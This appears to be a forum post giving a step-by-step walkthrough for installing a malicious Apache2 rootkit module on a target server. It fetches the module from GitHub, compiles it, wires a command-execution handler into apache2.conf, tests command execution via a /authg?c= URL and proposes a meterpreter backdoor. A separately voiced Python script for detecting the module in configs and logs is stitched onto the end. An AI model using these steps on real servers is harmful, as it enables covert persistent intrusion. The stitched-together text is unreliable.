Apache2 Rootkit for Linux

ltx_Lazzarus

Postby ltx_Lazzarus » Tue Apr 09, 2024 9:20 pm

What's a rootkit?
It's a sneaky little computer program that's designed to give the attackers ongoing access to a computer, all while keeping its presence under wraps.
These dodgy characters might use rootkits to hide the existence of other nasty programs, files, network connections, services, drivers, and other bits and bobs in the system. Rootkits are like the chameleons of the computer world - they intercept and modify the operating system's API calls that provide information about what's going on in the system, so they can stay hidden.

Setting Up apache-rootkit
Alright, now let's have a look at how to set up this apache-rootkit thing, mate. You can find the module over at this link:
https://github.com/ChristianPapathanasiou/apache-rootkit

This apache-rootkit is a real sneaky bugger - it's a malicious Apache module with rootkit capabilities. The best part is, you can load it into an Apache2 configuration without too much fuss, and it'll leave hardly any traces behind. Ripper!

-- 1 -- Alright, to get this apache-rootkit up and running, you'll need to install the Apache2 development kit first. Just run the following command on the target system:

sudo apt-get install apache2-dev

Rightio, to get this apache-rootkit working, we need to get our hands on the Apache2 development kit first. We need to use that to compile the module's source code into a shared object file.

-- 2 -- Before we go ahead and clone that apache-rootkit repository, we'll need to make our way over to the temporary directory on the target system:

cd /tmp

-- 3 -- Now, clone the repository:

git clone https://github.com/ChristianPapathanasiou/apache-rootkit.git

-- 4 -- Now that we've got that apache-rootkit repo all cloned, let's mosey on over to the actual "apache-rootkit" directory:

cd apache-rootkit

-- 5 -- It's time to get this module compiled up:

apxs -c -i mod_authg.c

Just run that command I mentioned, and the module will get all compiled up nicely. Then it'll automatically copy itself over to the right spot, so we don't have to worry about that.

-- 6 -- Now, get it loaded up in the Apache2 configuration. All we need to do is run this command:

vim /etc/apache2/apache2.conf

-- 7 -- You'll want to pop the following configuration at the top of the file. This will ensure the module gets loaded up correctly and we can start using all the nifty features it's got to offer:

LoadModule authg_module /usr/lib/apache2/modules/mod_authg.so
<Location /authg>
SetHandler authg
</Location>

Now that we've got that configuration all sorted out, save the file.

-- 8 -- After loading the “mod_authg.so” module, you'll need to restart the apache2 service; just type this command:

sudo systemctl restart apache2

TESTING ROOTKIT
Now that we've put together an' loaded up the apache-rootkit module, we can give it a proper test by tryin' out some sneaky command injection tricks.
Ya can do the ol' command injection on the apache2 server by openin' up this URL in ya browser:

http://<SERVER-IP>/authg?c=whoami

This here URL taps into the apache-rootkit module handler called "authg" and tries to flog a system command to get it runnin'.
If the apache-rootkit module's doin' its thing, ya should get the output of the command we chucked in as "www-data".
Now that we've checked an' made sure the module's all good an' workin', we can use it to set up a sneaky little PHP backdoor. This'll give us a meterpreter session whenever we run it, no worries.
stopthe4ttack.box
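The setup steps above leave two durable artefacts on disk: a LoadModule line pointing at a freshly compiled mod_authg.so and a <Location /authg> block binding the "authg" handler, and the testing step sends requests to that path with a c= query parameter. The following script is an added example, not code from the post or from the apache-rootkit project: it audits an apache2.conf-style file for modules and handlers that are not on a known-good baseline, collects the Location paths bound to unknown handlers, and then scans Apache combined-format access-log lines for requests to those paths. The baseline sets (APPROVED_MODULES, KNOWN_HANDLERS), the sample config and the log lines are all constructed for illustration, and whether such a request ever reaches the access log on a compromised host is an assumption, not something the post states.

```python
"""Added example, not code from the post or from the apache-rootkit project:
audit an Apache config for modules and handlers outside a known-good baseline,
then use the suspicious Location paths to scan access-log lines. The baseline,
the sample config and the log lines are all constructed for illustration."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed baseline: module names the operator has approved on this host.
APPROVED_MODULES = {"mpm_event_module", "dir_module", "mime_module", "php_module"}
# Handler names a stock install is expected to bind with SetHandler.
KNOWN_HANDLERS = {"server-status", "server-info", "cgi-script", "default-handler"}

LOADMODULE_RE = re.compile(r"^\s*LoadModule\s+(\S+)\s+(\S+)", re.IGNORECASE)
LOCATION_OPEN_RE = re.compile(r"^\s*<Location\s+([^>]+)>", re.IGNORECASE)
LOCATION_CLOSE_RE = re.compile(r"^\s*</Location>", re.IGNORECASE)
SETHANDLER_RE = re.compile(r"^\s*SetHandler\s+(\S+)", re.IGNORECASE)
# Apache "combined" log format up to the status code; the rest is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)


def audit_config(text):
    """Return (findings, watch_paths).

    findings: (line number, kind, detail) for every LoadModule not in the
    baseline and every SetHandler whose handler name is unknown.
    watch_paths: the <Location> prefixes bound to unknown handlers, which
    are the request paths worth watching in the access log.
    """
    findings, watch_paths = [], set()
    location = None  # path of the <Location> block we are currently inside
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOADMODULE_RE.match(line)
        if m:
            name, path = m.groups()
            if name not in APPROVED_MODULES:
                findings.append((lineno, "unapproved module", f"{name} <- {path}"))
            continue
        m = LOCATION_OPEN_RE.match(line)
        if m:
            location = m.group(1).strip()
            continue
        if LOCATION_CLOSE_RE.match(line):
            location = None
            continue
        m = SETHANDLER_RE.match(line)
        if m and m.group(1) not in KNOWN_HANDLERS:
            findings.append((lineno, "unknown handler", f"{m.group(1)} at {location or '(global)'}"))
            if location:
                watch_paths.add(location)
    return findings, watch_paths


def scan_access_log(lines, watch_paths):
    """Return (client ip, path, query params, status) for each request whose
    path falls under one of watch_paths (Location matching is by path prefix)."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        url = urlsplit(m.group("target"))
        for prefix in watch_paths:
            if url.path == prefix or url.path.startswith(prefix.rstrip("/") + "/"):
                params = {k: v[0] for k, v in parse_qs(url.query).items()}
                hits.append((m.group("ip"), url.path, params, int(m.group("status"))))
                break
    return hits


# Constructed sample config: the post's two directives dropped into an
# otherwise ordinary apache2.conf.
SAMPLE_CONFIG = """\
LoadModule mpm_event_module /usr/lib/apache2/modules/mod_mpm_event.so
LoadModule authg_module /usr/lib/apache2/modules/mod_authg.so
<Location /authg>
SetHandler authg
</Location>
LoadModule dir_module /usr/lib/apache2/modules/mod_dir.so
<Location /server-status>
SetHandler server-status
</Location>
"""

# Constructed access-log lines (combined format); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Apr/2024:21:30:01 +0000] "GET /authg?c=whoami HTTP/1.1" 200 9 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Apr/2024:21:30:02 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
198.51.100.7 - - [09/Apr/2024:21:31:10 +0000] "GET /server-status HTTP/1.1" 403 199 "-" "curl/8.0"
"""

if __name__ == "__main__":
    findings, watch = audit_config(SAMPLE_CONFIG)
    for lineno, kind, detail in findings:
        print(f"config line {lineno}: {kind}: {detail}")
    for ip, path, params, status in scan_access_log(SAMPLE_LOG.splitlines(), watch):
        print(f"{ip} requested {path} with {params} -> {status}")
```

On a real host the config audit is the more dependable signal of the two: `apxs -i` drops an unpackaged .so into /usr/lib/apache2/modules, so a module file that `dpkg -S` cannot attribute to any package, combined with a LoadModule line outside the baseline, is worth treating as a finding even before any request is seen. `apache2ctl -M` gives the list of modules actually loaded by the running server for comparison against the config on disk. Log scanning is the weaker check because a module that runs as a request handler is also in a position to decide what gets logged, which is why the example derives its watch paths from the config rather than relying on the log alone.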
